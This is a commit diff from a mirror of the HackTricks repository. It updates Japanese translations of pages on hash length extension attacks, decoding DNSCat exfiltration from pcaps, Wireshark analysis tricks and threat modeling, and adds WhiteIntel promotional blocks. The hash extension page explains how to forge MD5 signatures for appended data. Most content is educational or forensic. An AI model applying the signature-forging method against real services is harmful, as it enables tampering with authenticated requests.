Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

Browse source
This commit is contained in:
Translator 2024-04-18 03:40:36 +00:00
parent 8e94700942
commit 7d09db559c
34 changed files with 1918 additions and 962 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

58
crypto-and-stego/hash-length-extension-attack.md
View file

@ -1,21 +1,34 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクション
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
# 攻撃の概要
あるサーバーが、既知のクリアテキストデータに**秘密を追加**してそのデータをハッシュ化していると想像してください。以下を知っている場合:
あるサーバーが、ある既知のクリアテキストデータに**秘密**を**追加**してそのデータをハッシュ化していると想像してください。以下を知っている場合:
* **秘密の長さ**(これは与えられた長さ範囲からもブルートフォースできます)
* **クリアテキストデータ**
@ -24,14 +37,14 @@ HackTricksをサポートする他の方法
* 通常、デフォルトのものが使用されるため、他の3つの要件が満たされている場合、これも満たされます
* パディングは秘密+データの長さに応じて異なります。そのため、秘密の長さが必要です
その後、**攻撃者**は**データを追加**し、**以前のデータ+追加されたデータ**の有効な**署名**を**生成**することが可能です。
その後、**攻撃者**は**データ**を**追加**し、**前のデータ+追加されたデータ**の有効な**署名**を**生成**することが可能です。
## 方法
基本的に、脆弱なアルゴリズムは、まず**データブロックをハッシュ**し、その後、**以前に**作成された**ハッシュ**(状態)から**次のデータブロックを追加**して**ハッシュ**します。
基本的に、脆弱なアルゴリズムは、まず**データブロックをハッシュ**し、その後、**以前に**作成された**ハッシュ**(状態)から**次のデータブロックを追加**して**ハッシュ**します。
たとえば、秘密が「secret」でデータが「data」であるとします。"secretdata"のMD5は6036708eba0d11f6ef52ad44e8b74d5bです。\
攻撃者が文字列「append」を追加したい場合
次に、秘密が「secret」でデータが「data」であると想像してください。「secretdata」のMD5は6036708eba0d11f6ef52ad44e8b74d5bです。\
攻撃者が文字列「append」を追加したい場合
* 64個の「A」のMD5を生成する
* 以前に初期化されたハッシュの状態を6036708eba0d11f6ef52ad44e8b74d5bに変更する
@ -42,21 +55,32 @@ HackTricksをサポートする他の方法
{% embed url="https://github.com/iagox86/hash_extender" %}
# 参考文献
## 参考文献
この攻撃について詳しく説明されている[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
この攻撃については、[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)で詳しく説明されています。
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>

35
forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
View file

@ -4,16 +4,29 @@
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出する**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見す
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする
* **ハッキングテクニックを共有するためにPRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに提出する
</details>
## WhiteIntel
DNSCat によって**暗号化を使用せずに**データが**外部に持ち出されている**PCAPがある場合、外部に持ち出されたコンテンツを見つけることができます。
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されているかどうかを確認する**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
DNSCat によって**暗号化を使用せずに**データが**外部に送信**される pcap ファイルがある場合、外部に送信されたコンテンツを見つけることができます。
**最初の9バイト**は実際のデータではなく、**C\&C通信**に関連していることを知っていれば十分です。
```python
@ -39,19 +52,19 @@ last = qry
Python3で動作するスクリプトがあります: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
```bash
python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**フォロー**する。
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**フォローする。**
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>

63
forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
View file

@ -4,18 +4,32 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手す
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れ
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## Wiresharkスキルの向上
### チュートリアル
@ -35,7 +49,7 @@ _Analyze_ --> _Expert Information_をクリックすると、**分析された**
![](<../../../.gitbook/assets/image (570).png>)
**解決されたアドレス**
**解決済みアドレス**
_Statistics_ --> _Resolved Addresses_の下には、wiresharkによって**解決された**ポート/トランスポートからプロトコル、MACから製造業者など、いくつかの**情報**が表示されます。通信に何が関与しているかを知ることは興味深いです。
@ -55,7 +69,7 @@ _Statistics_ --> _Conversations_の下には、通信中の**会話の要約**
**エンドポイント**
_Statistics_ --> _Endpoints_の下には、通信中の**エンドポイントの要約**とそれに関するデータが表示されます。
_Statistics_ --> _Endpoints_の下には、通信中の**エンドポイントの要約**とそれぞれに関するデータが表示されます。
![](<../../../.gitbook/assets/image (575).png>)
@ -71,10 +85,10 @@ _Statistics_ --> _I/O Graph_の下には、通信の**グラフ**が表示され
![](<../../../.gitbook/assets/image (574).png>)
### フィルタ
### フィルタ
ここでは、プロトコルに応じたWiresharkフィルタを見つけることができます:[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
他の興味深いフィルタ
ここでは、プロトコルに応じたWiresharkフィルタを見つけることができます[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
他の興味深いフィルタ:
- `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
- HTTPおよび初期HTTPSトラフィック
@ -97,7 +111,7 @@ Host HTTPヘッダーを表示する列を追加できます
![](<../../../.gitbook/assets/image (403).png>)
そして、初期化されたHTTPS接続からサーバー名を追加する列を追加できます**ssl.handshake.type == 1**
および初期化HTTPS接続からサーバー名を追加する列**ssl.handshake.type == 1**
![](<../../../.gitbook/assets/image (408) (1).png>)
@ -121,7 +135,7 @@ _edit>preference>protocol>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
_Edit_を押して、サーバーとプライベートキーのすべてのデータを追加します_IP、ポート、プロトコル、キーファイル、パスワード_
_Edit_を押して、サーバーと秘密鍵のすべてのデータ_IP、ポート、プロトコル、キーファイル、パスワード_を追加します
### 対称セッションキーを使用してhttpsトラフィックを復号化する
@ -133,10 +147,9 @@ FirefoxとChromeの両方には、TLSセッションキーを記録する機能
![](<../../../.gitbook/assets/image (99).png>)
Wiresharkにこれをインポートするには、\_edit > preference > protocol > ssl > に移動し、Pre-Master-Secretログファイル名にインポートします
これをWiresharkにインポートするには、\_edit > preference > protocol > ssl > に移動し、Pre-Master-Secretログファイル名にインポートします
![](<../../../.gitbook/assets/image (100).png>)
## ADB通信
APKが送信されたADB通信からAPKを抽出します
@ -166,16 +179,28 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を使用して、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

107
generic-methodologies-and-resources/threat-modeling.md
View file

@ -1,44 +1,58 @@
# 脅威モデリング
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難型マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、エンジンを**無料**で試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 脅威モデリング
脅威モデリングに関するHackTricksの包括的なガイドへようこそこのサイバーセキュリティの重要な側面を探求し、システムの潜在的な脆弱性を特定し、理解し、戦略を立てることができます。このスレッドは、現実世界の例、役立つソフトウェア、わかりやすい説明が詰まったステップバイステップガイドとして機能します。セキュリティの初心者から経験豊富な実践者まで、セキュリティの防御策を強化したい方に最適です。
脅威モデリングに関するHackTricksの包括的なガイドへようこそこでは、システム内の潜在的な脆弱性を特定し、理解し、対策を立てるサイバーセキュリティの重要な側面を探求します。このスレッドは、実践的な例、役立つソフトウェア、わかりやすい説明が詰まったステップバイステップのガイドとして機能します。初心者から経験豊富な実務家まで、サイバーセキュリティの防御を強化したい人に最適です。
### よく使用されるシナリオ
1. **ソフトウェア開発**セキュアソフトウェア開発ライフサイクルSSDLCの一環として、脅威モデリングは開発の初期段階での**潜在的な脆弱性の特定**に役立ちます。
2. **ペネトレーションテスト**ペネトレーションテスト実行標準PTESフレームワークでは、テストを実施する前にシステムの脆弱性を理解するために**脅威モデリングが必要**です。
1. **ソフトウェア開発**セキュアソフトウェア開発ライフサイクルSSDLCの一環として、脅威モデリングは開発初期段階での**潜在的な脆弱性の特定**に役立ちます。
2. **ペネトレーションテスト**ペネトレーションテスト実行標準PTESフレームワークでは、**システムの脆弱性を理解するための脅威モデリング**がテストの実施前に必要です。
### 脅威モデルの要点
脅威モデルは通常、アプリケーションの計画されたアーキテクチャまたは既存のビルドを示す図、画像、または他の形式の視覚的なイラストレーションとして表されます。これは**データフローダイアグラム**に似ていますが、そのセキュリティ指向の設計が異なります。
脅威モデルは通常、アプリケーションの計画されたアーキテクチャや既存の構築を示す図、画像、または他の視覚的な表現として表されます。これは**データフローダイアグラム**に似ていますが、そのセキュリティ指向の設計において異なる点があります。
脅威モデルには、潜在的な脆弱性、リスク、または障壁を示す赤でマークされた要素がよく含まれます。リスクの特定プロセスを効率化するために、CIA機密性、完全性、可用性トライアドが使用され、STRIDEが最も一般的な脅威モデリング手法の1つとなっています。ただし、選択する手法は特定のコンテキストと要件によって異なる場合があります。
脅威モデルには、潜在的な脆弱性、リスク、または障壁を示す赤でマークされた要素がよく含まれます。リスクの特定プロセスを効率化するために、CIA機密性、整合性、可用性トライアドが使用され、多くの脅威モデリング手法の基礎となっています。STRIDEが最も一般的な手法の1つですが、選択される手法は特定の文脈や要件に応じて異なる場合があります。
### CIAトライアド
CIAトライアドは、情報セキュリティの分野で広く認識されているモデルであり、機密性、完全性、可用性を表しています。これらの3つの要素は、脅威モデリング手法を含む多くのセキュリティ対策やポリシーの基盤となります。
CIAトライアドは、情報セキュリティ分野で広く認識されているモデルで、機密性、整合性、可用性を表しています。これらの3つの柱は、脅威モデリング手法を含む多くのセキュリティ対策やポリシーの基盤を形成しており、それぞれの柱は以下のような意味を持ちます。
1. **機密性**:データやシステムが不正な個人によってアクセスされないようにすること。これはセキュリティの中心的な側面であり、適切なアクセス制御、暗号化、および他の対策を必要としてデータ漏洩を防止します。
2. **完全性**:データのライフサイクル全体での正確性、一貫性、信頼性。この原則は、データが不正な者によって変更または改ざんされないようにすることを保証します。これにはチェックサム、ハッシュなどのデータ検証方法がしばしば使用されます。
3. **可用性**:データとサービスが必要な時に認証されたユーザーに利用可能であること。これには冗長性、障害耐性、高可用性の構成がしばしば関与し、システムが障害に直面しても稼働し続けるようにします。
1. **機密性**:データやシステムが不正な個人によってアクセスされないようにすること。これはセキュリティの中心的な側面であり、データ漏洩を防ぐために適切なアクセス制御、暗号化、およびその他の対策が必要です。
2. **整合性**:データの正確性、一貫性、および信頼性をデータのライフサイクル全体で確保すること。この原則は、データが不正な者によって変更されたり改ざんされたりしないようにすることを保証します。これにはチェックサム、ハッシュ、および他のデータ検証手法がしばしば含まれます。
3. **可用性**:データやサービスが必要な時に認可されたユーザーに利用可能であることを保証すること。これには冗長性、障害耐性、および高可用性構成が含まれ、システムが障害に直面しても稼働し続けるようにします。
### 脅威モデリング手法
1. **STRIDE**Microsoftによって開発されたSTRIDEは、**スプーフィング、改ざん、否認、情報開示、サービス妨害、特権昇格**を表す頭字語です。各カテゴリは脅威のタイプを表し、この手法はプログラムやシステムの設計フェーズで潜在的な脅威を特定するために一般的に使用されます。
2. **DREAD**これはMicrosoftの別の手法で、特定された脅威のリスク評価に使用されます。DREADは**ダメージの可能性、再現性、悪用可能性、影響を受けるユーザー、発見可能性**を表しています。これらの要素にスコアを付け、特定された脅威の優先順位を決定するために使用されます。
3. **PASTA**攻撃シミュレーションと脅威分析のプロセスこれは7つのステップからなる**リスク中心**の手法です。セキュリティ目標の定義と特定、技術的範囲の作成、アプリケーション分解、脅威分析、脆弱性分析、リスク/トリアージ評価を含みます。
4. **Trike**これは資産の防御に焦点を当てたリスクベースの手法です。リスク管理の観点から始まり、その文脈で脅威と脆弱性を見ます。
5. **VAST**(ビジュアル、アジャイル、シンプル脅威モデリング):このアプローチはよりアクセスしやすく、アジャイルな開発環境に統合されることを目指しています。他の手法から要素を組み合わせ、脅威の視覚的な表現に焦点を当てています。
6. **OCTAVE**運用上重要な脅威、資産、脆弱性評価CERT Coordination Centerによって開発されたこのフレームワークは、特定のシステムやソフトウェアではなく、組織のリスク評価を対象としています。
1. **STRIDE**Microsoftによって開発されたSTRIDEは、**スプーフィング、改ざん、否認、情報開示、サービス拒否、特権昇格**を表す頭字語です。各カテゴリは脅威のタイプを表し、この手法は潜在的な脅威を特定するためにプログラムやシステムの設計段階で一般的に使用されます。
2. **DREAD**Microsoftの別の手法で、特定された脅威のリスク評価に使用されます。DREADは**損害の可能性、再現性、悪用可能性、影響を受けるユーザー、発見可能性**を表しています。これらの要素はスコア付けされ、その結果は特定された脅威の優先順位付けに使用されます。
3. **PASTA**攻撃シミュレーションと脅威分析のプロセスこれは7つのステップからなる**リスク中心**の手法です。セキュリティ目標の定義と特定、技術的範囲の作成、アプリケーション分解、脅威分析、脆弱性分析、リスク/トリアージ評価が含まれます。
4. **Trike**:資産の防御に焦点を当てたリスクベースの手法です。リスク管理の観点から始まり、その文脈で脅威や脆弱性を考察します。
5. **VAST**(ビジュアル、アジャイル、シンプル脅威モデリング):このアプローチは、アジャイル開発環境に統合されやすく、**脅威の視覚的表現**に焦点を当てています。他の手法から要素を組み合わせ、脅威の視覚的表現に重点を置いています。
6. **OCTAVE**運用上重要な脅威、資産、脆弱性評価CERT Coordination Centerによって開発されたこのフレームワークは、**特定のシステムやソフトウェアではなく組織のリスク評価**に焦点を当てています。
## ツール
脅威モデルの作成と管理を**支援**するために利用できるいくつかのツールとソフトウェアソリューションがあります。以下にいくつかのツールを紹介します。
脅威モデルの作成と管理を**支援**するために利用可能ないくつかのツールやソフトウェアソリューションがあります。以下は検討する価値のあるいくつかのツールです。
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
サイバーセキュリティ専門家向けの高度なクロスプラットフォームおよびマルチ機能GUIウェブスパイダー/クローラーです。Spider Suiteは攻撃面のマッピングと分析に使用できます。
サイバーセキュリティ専門家向けの高度なクロスプラットフォームおよびマルチ機能GUIウェブスパイダー/クローラーです。Spider Suiteは攻撃面のマッピングと分析に使用できます。
**使用方法**
@ -52,7 +66,7 @@ CIAトライアドは、情報セキュリティの分野で広く認識され
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
OWASPのオープンソースプロジェクトであるThreat Dragonは、システムダイアグラム作成と脅威/緩和策の自動生成のためのルールエンジンを備えたWebおよびデスクトップアプリケーションです。
OWASPのオープンソースプロジェクトであるThreat Dragonは、システム図作成と脅威/緩和策の自動生成を行うルールエンジンを備えたWebおよびデスクトップアプリケーションです。
**使用方法**
@ -60,13 +74,64 @@ OWASPのオープンソースプロジェクトであるThreat Dragonは、シ
<figure><img src="../.gitbook/assets/create_new_project_1.jpg" alt=""><figcaption></figcaption></figure>
場合によっては、次のように表示されることもあります。
場合によっては、次のように見えるかもしれません:
<figure><img src="../.gitbook/assets/1_threatmodel_create_project.jpg" alt=""><figcaption></figcaption></figure>
2. 新しいプロジェクトを起動
<figure><img src="../.gitbook/assets/launch_new
<figure><img src="../.gitbook/assets/launch_new_project_2.jpg" alt=""><figcaption></figcaption></figure>
3. 新しいプロジェクトを保存
<figure><img src="../.gitbook/assets/save_new_project.jpg" alt=""><figcaption></figcaption></figure>
4. モデルを作成
SpiderSuite Crawlerなどのツールを使用して、基本的なモデルは次のようになります
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
エンティティについて少し説明します:
* プロセスWebサーバーやWeb機能などのエンティティ自体
* アクターWebサイトの訪問者、ユーザー、管理者などの人物
* データフローライン(相互作用の指標)
* 信頼境界(異なるネットワークセグメントやスコープ)
* ストア(データが保存される場所、例:データベース)
5. 脅威を作成ステップ1
最初に脅威を追加したいレイヤーを選択する必要があります
<figure><img src="../.gitbook/assets/3_threatmodel_chose-threat-layer.jpg" alt=""><figcaption></figcaption></figure>
今、脅威を作成できます
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
アクター脅威とプロセス脅威の違いに注意してください。アクターに脅威を追加する場合は、「スプーフィング」と「否認」のみを選択できます。ただし、この例ではプロセスエンティティに脅威を追加するため、脅威作成ボックスには次のように表示されます:
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. 完了
これで、完成したモデルは次のようになります。これがOWASP Threat Dragonを使用してシンプルな脅威モデルを作成する方法です。
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
